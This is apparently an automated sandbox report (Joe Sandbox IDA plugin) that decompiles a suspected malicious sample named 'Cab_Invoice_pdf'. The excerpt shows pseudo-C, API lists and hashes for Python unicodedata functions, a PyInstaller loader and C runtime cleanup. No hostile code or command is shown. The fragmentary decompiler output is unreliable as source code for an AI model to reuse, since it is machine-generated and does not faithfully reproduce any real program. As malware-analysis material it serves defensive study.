                            													_t73 = _a4;
                            													_t36 = E6E2F3550(_a4, _t82, 0, 0, 1);
                            													__eflags = _t36;
                            													if(_t36 == 0) {
                            														goto L24;
                            													} else {
                            														return E6E2F2A70(_t47, _t73, _t82, _t73, _t82, 0);
                            													}
                            												}
                            											} else {
                            												_t75 = _a4;
                            												__eflags = E6E2F3550(_a4, _t82, 1, 1, 1);
                            												if(__eflags == 0) {
                            													goto L24;
                            												} else {
                            													return E6E2F3030(_t47, _t75, _t82, __eflags, _t75, _t82, 1);
                            												}
                            											}
                            										} else {
                            											_t77 = _a4;
                            											__eflags = E6E2F3550(_a4, _t82, 1, 0, 1);
                            											if(__eflags == 0) {
                            												goto L24;
                            											} else {
                            												return E6E2F3030(_t47, _t77, _t82, __eflags, _t77, _t82, 0);
                            											}
                            										}
                            									}
                            								} else {
                            									_t42 =  *_t61(_t56);
                            									_t87 = _t87 + 4;
                            									__eflags = _t42 - 0xffffffff;
                            									if(_t42 == 0xffffffff) {
                            										L27:
                            										goto L28;
                            									} else {
                            										goto L12;
                            									}
                            								}
                            							} else {
                            								__imp___PyArg_BadArgument("normalize", "argument 2", "str", _t56);
                            								return _t81;
                            							}
                            						} else {
                            							_t44 =  *_t61(_t55);
                            							_t87 = _t87 + 4;
                            							__eflags = _t44 - 0xffffffff;
                            							if(_t44 == 0xffffffff) {
                            								L28:
                            								L29:
                            								return _t81;
                            							} else {
                            								_t61 = __imp___PyUnicode_Ready;
                            								goto L8;
                            							}
                            						}
                            					} else {
                            						__imp___PyArg_BadArgument("normalize", "argument 1", "str", _t55);
                            						return _t81;
                            					}
                            				}
                            			}



























                            APIs
                            • _PyArg_CheckPositional.PYTHON38(normalize,?,00000002,00000002), ref: 6E2F207A
                            • _PyArg_BadArgument.PYTHON38(normalize,argument 1,str), ref: 6E2F20AD
                            • _PyArg_BadArgument.PYTHON38(normalize,argument 2,str,?), ref: 6E2F20FF
                            • _PyUnicode_EqualToASCIIId.PYTHON38(?,6E3F8A28), ref: 6E2F213D
                            • _PyUnicode_EqualToASCIIId.PYTHON38(?,6E3F8A34), ref: 6E2F217C
                            • _PyUnicode_EqualToASCIIId.PYTHON38(?,6E3F837C), ref: 6E2F21B7
                              • Part of subcall function 6E2F3030: PyMem_Malloc.PYTHON38(?,?,00000000,?), ref: 6E2F30A3
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Arg_EqualUnicode_$Argument$CheckMallocMem_Positional
                            • String ID: argument 1$argument 2$invalid normalization form$normalize$str
                            • API String ID: 3425707189-4140678229
                            • Opcode ID: fbd52154e0a4bda25fe330a19fdd717aa86b8df70d609a1bf0300678541edff7
                            • Instruction ID: 780d9a25849015d9227f550fdbabf5294ef2e16ab6d4b1891f0368dc64105dd0
                            • Opcode Fuzzy Hash: fbd52154e0a4bda25fe330a19fdd717aa86b8df70d609a1bf0300678541edff7
                            • Instruction Fuzzy Hash: EA512673790219E7EA1052D87C81F9AB71BEB8167AF140125FA099B382E662D417C7E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • htonl.WS2_32(?), ref: 01313391
                            • PyUnicode_Decode.PYTHON38(013120B9,013120BA,utf-8,strict,?,00000000,?,00000000,00000000,01312051,00000000,?,00000000,00000000), ref: 013133B8
                            • PyUnicode_FromFormat.PYTHON38(%U?%zu,00000000,56CA75C0,?,00000000,00000000,?,?,?,00000000), ref: 013133C7
                            • Py_DecRef.PYTHON38(00000000,?,00000000,00000000,?,?,?,00000000), ref: 013133D0
                            • PySys_GetObject.PYTHON38(path,?,00000000,00000000,?,?,?,00000000), ref: 013133DB
                            • Py_DecRef.PYTHON38(00000000,Installing PYZ: Could not get sys.path), ref: 013133F3
                            • PyList_Append.PYTHON38(00000000,00000000), ref: 01313400
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Unicode_$AppendDecodeFormatFromList_ObjectSys_htonl
                            • String ID: %U?%zu$Failed to append to sys.path$Installing PYZ: Could not get sys.path$path$strict$utf-8
                            • API String ID: 4195543242-2673223963
                            • Opcode ID: 08da7eadab9082369601e11e61dd1e5a11971e47bed2242a162ef8653c194c7e
                            • Instruction ID: 496f7c65bc7fced27dd958ce77e84fe30bde78c8848fef24518dbe2a0e628ded
                            • Opcode Fuzzy Hash: 08da7eadab9082369601e11e61dd1e5a11971e47bed2242a162ef8653c194c7e
                            • Instruction Fuzzy Hash: 4B115B72500201BBDB151B7ADC498577B9DBE8137EF0D4161FC06A320FEA21E55087F9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E013281FB(intOrPtr _a4) {
                            				intOrPtr _v8;
                            				intOrPtr _t25;
                            				intOrPtr* _t26;
                            				intOrPtr _t28;
                            				intOrPtr* _t29;
                            				intOrPtr* _t31;
                            				intOrPtr* _t45;
                            				intOrPtr* _t46;
                            				intOrPtr* _t47;
                            				intOrPtr* _t55;
                            				intOrPtr* _t70;
                            				intOrPtr _t74;
                            
                            				_t74 = _a4;
                            				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                            				if(_t25 != 0 && _t25 != 0x133c838) {
                            					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                            					if(_t45 != 0 &&  *_t45 == 0) {
                            						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                            						if(_t46 != 0 &&  *_t46 == 0) {
                            							E013209EB(_t46);
                            							E01327D80( *((intOrPtr*)(_t74 + 0x88)));
                            						}
                            						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                            						if(_t47 != 0 &&  *_t47 == 0) {
                            							E013209EB(_t47);
                            							E01327E7E( *((intOrPtr*)(_t74 + 0x88)));
                            						}
                            						E013209EB( *((intOrPtr*)(_t74 + 0x7c)));
                            						E013209EB( *((intOrPtr*)(_t74 + 0x88)));
                            					}
                            				}
                            				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                            				if(_t26 != 0 &&  *_t26 == 0) {
                            					E013209EB( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                            					E013209EB( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                            					E013209EB( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                            					E013209EB( *((intOrPtr*)(_t74 + 0x8c)));
                            				}
                            				E0132836E( *((intOrPtr*)(_t74 + 0x9c)));
                            				_t28 = 6;
                            				_t55 = _t74 + 0xa0;
                            				_v8 = _t28;
                            				_t70 = _t74 + 0x28;
                            				do {
                            					if( *((intOrPtr*)(_t70 - 8)) != 0x133c300) {
                            						_t31 =  *_t70;
                            						if(_t31 != 0 &&  *_t31 == 0) {
                            							E013209EB(_t31);
                            							E013209EB( *_t55);
                            						}
                            						_t28 = _v8;
                            					}
                            					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                            						_t29 =  *((intOrPtr*)(_t70 - 4));
                            						if(_t29 != 0 &&  *_t29 == 0) {
                            							E013209EB(_t29);
                            						}
                            						_t28 = _v8;
                            					}
                            					_t55 = _t55 + 4;
                            					_t70 = _t70 + 0x10;
                            					_t28 = _t28 - 1;
                            					_v8 = _t28;
                            				} while (_t28 != 0);
                            				return E013209EB(_t74);
                            			}
















                            APIs
                            • ___free_lconv_mon.LIBCMT ref: 0132823F
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327D9D
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327DAF
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327DC1
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327DD3
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327DE5
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327DF7
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E09
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E1B
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E2D
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E3F
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E51
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E63
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E75
                            • _free.LIBCMT ref: 01328234
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 01328256
                            • _free.LIBCMT ref: 0132826B
                            • _free.LIBCMT ref: 01328276
                            • _free.LIBCMT ref: 01328298
                            • _free.LIBCMT ref: 013282AB
                            • _free.LIBCMT ref: 013282B9
                            • _free.LIBCMT ref: 013282C4
                            • _free.LIBCMT ref: 013282FC
                            • _free.LIBCMT ref: 01328303
                            • _free.LIBCMT ref: 01328320
                            • _free.LIBCMT ref: 01328338
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                            • String ID:
                            • API String ID: 161543041-0
                            • Opcode ID: db136d435113531aa93aaa6f35193faf4e2e816766347699b89fb456f4eea32c
                            • Instruction ID: 53c8aa4b8fa531ebe811bd7292aeb80c714b057b3129855e0c54e41c5e2a0d8c
                            • Opcode Fuzzy Hash: db136d435113531aa93aaa6f35193faf4e2e816766347699b89fb456f4eea32c
                            • Instruction Fuzzy Hash: B8317C316007229FFB25BA7ED845B5B77F8EF01618F10495AE59AD71A0DF31AC44CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _PyArg_BadArgument.PYTHON38(decomposition,argument,a unicode character,?), ref: 6E2F1C97
                            • _PyUnicode_Ready.PYTHON38(?), ref: 6E2F1CB9
                            • PyUnicode_FromString.PYTHON38(6E2F61FB), ref: 6E2F1D64
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Unicode_$Arg_ArgumentFromReadyString
                            • String ID: $%04X$a unicode character$argument$decomposition
                            • API String ID: 3000140846-4056541097
                            • Opcode ID: 0055669e2f3cbbc99d8cb890e2670bef3d51efae7b431854b5e59f67ca6828c0
                            • Instruction ID: bd101712fbc24679c21b28d3d470ae206d3aeed765917571c0a001cb30f14097
                            • Opcode Fuzzy Hash: 0055669e2f3cbbc99d8cb890e2670bef3d51efae7b431854b5e59f67ca6828c0
                            • Instruction Fuzzy Hash: D9517AB2AA052EDBDB108EACCC41A99B3F6DF46311F440398ECD6D7242D731D98AC790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _PyArg_CheckPositional.PYTHON38(numeric,?,00000001,00000002), ref: 6E2F14A5
                            • _PyArg_BadArgument.PYTHON38(numeric,argument 1,a unicode character,?), ref: 6E2F14D3
                            • _PyUnicode_Ready.PYTHON38 ref: 6E2F14EC
                            • _PyUnicode_ToNumeric.PYTHON38(00000080), ref: 6E2F15BA
                            • PyErr_SetString.PYTHON38(6E79ED94,not a numeric character), ref: 6E2F15E4
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Arg_Unicode_$ArgumentCheckErr_NumericPositionalReadyString
                            • String ID: a unicode character$argument 1$not a numeric character$numeric
                            • API String ID: 3535500773-2317633676
                            • Opcode ID: 2cf6cb8b3e3c0878b664c785967580174026bf49f5209338722a329f553646cc
                            • Instruction ID: c71a3360db30dfa88cefd2aa33a0b13bb4bc2ae8af8d8f50e438ed9a53d77b2f
                            • Opcode Fuzzy Hash: 2cf6cb8b3e3c0878b664c785967580174026bf49f5209338722a329f553646cc
                            • Instruction Fuzzy Hash: 0A415CF2BA410EDFDB104BA9D886B15B7E2EB41327B8442A5F916CB243D725C49B87D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _PyArg_CheckPositional.PYTHON38(decimal,?,00000001,00000002), ref: 6E2F11CE
                            • _PyUnicode_Ready.PYTHON38 ref: 6E2F11FB
                            • _PyArg_BadArgument.PYTHON38(decimal,argument 1,a unicode character,?), ref: 6E2F1220
                            • _PyUnicode_ToDecimalDigit.PYTHON38(00000080), ref: 6E2F12DE
                            • PyErr_SetString.PYTHON38(6E79ED94,not a decimal), ref: 6E2F12FB
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Arg_Unicode_$ArgumentCheckDecimalDigitErr_PositionalReadyString
                            • String ID: a unicode character$argument 1$decimal$not a decimal
                            • API String ID: 1715956419-3860666600
                            • Opcode ID: da0d386d7b2f2c8fec468f43cdb530e3bd9c85fa53e85ebbbe61fc99fe7e14a4
                            • Instruction ID: 9a944408227747b72276a95380f4cb1931baf76176dba9783632d1d899576b45
                            • Opcode Fuzzy Hash: da0d386d7b2f2c8fec468f43cdb530e3bd9c85fa53e85ebbbe61fc99fe7e14a4
                            • Instruction Fuzzy Hash: 8F414CB2BE412ADFF7004BE9DC81B55B3E3EB4232AB584165E815CB283D731D48B8790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _PyArg_CheckPositional.PYTHON38(digit,?,00000001,00000002), ref: 6E2F134E
                            • _PyUnicode_Ready.PYTHON38 ref: 6E2F137B
                            • _PyArg_BadArgument.PYTHON38(digit,argument 1,a unicode character,?), ref: 6E2F13A0
                            • _PyUnicode_ToDigit.PYTHON38(?), ref: 6E2F1433
                            • PyErr_SetString.PYTHON38(6E79ED94,not a digit), ref: 6E2F1450
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Arg_Unicode_$ArgumentCheckDigitErr_PositionalReadyString
                            • String ID: a unicode character$argument 1$digit$not a digit
                            • API String ID: 3305933226-4278345224
                            • Opcode ID: 003178f95ac098b232ad2e462495ea947c60f576e743d45651ad2da7568ea18b
                            • Instruction ID: f2ca3127a10d6da25d5cba1fe9cec61e7090a18caa14140f1490fe31fabdf704
                            • Opcode Fuzzy Hash: 003178f95ac098b232ad2e462495ea947c60f576e743d45651ad2da7568ea18b
                            • Instruction Fuzzy Hash: BD415BB37E010ADFEB004BEDEC81A55B3A3EB9622AB540165F915CB243DB21C48BC790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _PyArg_CheckPositional.PYTHON38(name,?,00000001,00000002), ref: 6E2F2291
                            • _PyArg_BadArgument.PYTHON38(name,argument 1,a unicode character,?), ref: 6E2F22BC
                            • _PyUnicode_Ready.PYTHON38 ref: 6E2F22DF
                            • PyErr_SetString.PYTHON38(6E79ED94,no such name), ref: 6E2F23AD
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Arg_$ArgumentCheckErr_PositionalReadyStringUnicode_
                            • String ID: a unicode character$argument 1$name$no such name
                            • API String ID: 391777190-3118485279
                            • Opcode ID: c89c6c277e2dda6a66d8b169b28b37e8d5123946e284813776459a73d9e1a65c
                            • Instruction ID: dc866fffe5a0d97d51336a4efa658e10eddbc8896ee29ece10b134a2063e71d0
                            • Opcode Fuzzy Hash: c89c6c277e2dda6a66d8b169b28b37e8d5123946e284813776459a73d9e1a65c
                            • Instruction Fuzzy Hash: F75139B3BA014DDFD7008BE9DC81BADB7F6EB4A315F1001A9E905DB281DB31C8468B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _PyUnicode_Ready.PYTHON38(?), ref: 6E2F36AB
                            • _PyUnicode_EqualToASCIIId.PYTHON38(?,6E3F8A28), ref: 6E2F36E3
                            • PyUnicode_Compare.PYTHON38(?,00000000), ref: 6E2F3733
                            • _Py_Dealloc.PYTHON38(-000000FF), ref: 6E2F3744
                            • _PyUnicode_EqualToASCIIId.PYTHON38(?,6E3F8A34), ref: 6E2F3759
                            • _PyUnicode_EqualToASCIIId.PYTHON38(?,6E3F837C), ref: 6E2F3777
                            • _PyUnicode_EqualToASCIIId.PYTHON38(?,6E3F8370), ref: 6E2F3790
                            • PyErr_SetString.PYTHON38(6E79ED94,invalid normalization form), ref: 6E2F37B3
                            Strings
                            • invalid normalization form, xrefs: 6E2F37AC
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Unicode_$Equal$CompareDeallocErr_ReadyString
                            • String ID: invalid normalization form
                            • API String ID: 3010910608-2281882113
                            • Opcode ID: f471013bcec61d158a155b03a2f40b346b628af99913bf9e5a0cc89deee4c788
                            • Instruction ID: 2e2e8a6b1d100ba4e2dd40bcb5bcd8f54f0039880e86151c8d24a8c57de32de4
                            • Opcode Fuzzy Hash: f471013bcec61d158a155b03a2f40b346b628af99913bf9e5a0cc89deee4c788
                            • Instruction Fuzzy Hash: 7F31F731E90509EBDF004AA9EC8DA5AB776FB4233AF100164EC06D6341E762D952C6E6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 91%
                            			E6E2F4483(void* __ebx, void* __edx, void* __edi) {
                            				intOrPtr _t34;
                            				signed int _t40;
                            				signed int _t45;
                            				signed char _t54;
                            				signed int _t56;
                            				signed int _t58;
                            				void* _t61;
                            				void* _t68;
                            				signed int _t72;
                            				void* _t75;
                            				signed int _t76;
                            				signed int _t80;
                            				void* _t82;
                            
                            				_t68 = __edx;
                            				E6E2F5090(__ebx, __edi, 0x6e3f7600, 0x10);
                            				_t34 =  *0x6e3f8a48; // 0x1
                            				if(_t34 > 0) {
                            					 *0x6e3f8a48 = _t34 - 1;
                            					 *(_t82 - 0x1c) = 1;
                            					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
                            					 *((char*)(_t82 - 0x20)) = E6E2F4B2A();
                            					 *(_t82 - 4) = 1;
                            					__eflags = "urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n" - 2;
                            					if("urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n" != 2) {
                            						E6E2F4E29(_t68, 1, _t75, 7);
                            						asm("int3");
                            						E6E2F5090(__ebx, 1, 0x6e3f7628, 0xc);
                            						_t72 =  *(_t82 + 0xc);
                            						__eflags = _t72;
                            						if(_t72 != 0) {
                            							L9:
                            							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
                            							__eflags = _t72 - 1;
                            							if(_t72 == 1) {
                            								L12:
                            								_t58 =  *(_t82 + 0x10);
                            								_t76 = E6E2F463E( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
                            								 *(_t82 - 0x1c) = _t76;
                            								__eflags = _t76;
                            								if(_t76 != 0) {
                            									_t76 = E6E2F4329(_t61,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
                            									 *(_t82 - 0x1c) = _t76;
                            									__eflags = _t76;
                            									if(_t76 != 0) {
                            										goto L14;
                            									}
                            								}
                            							} else {
                            								__eflags = _t72 - 2;
                            								if(_t72 == 2) {
                            									goto L12;
                            								} else {
                            									_t58 =  *(_t82 + 0x10);
                            									L14:
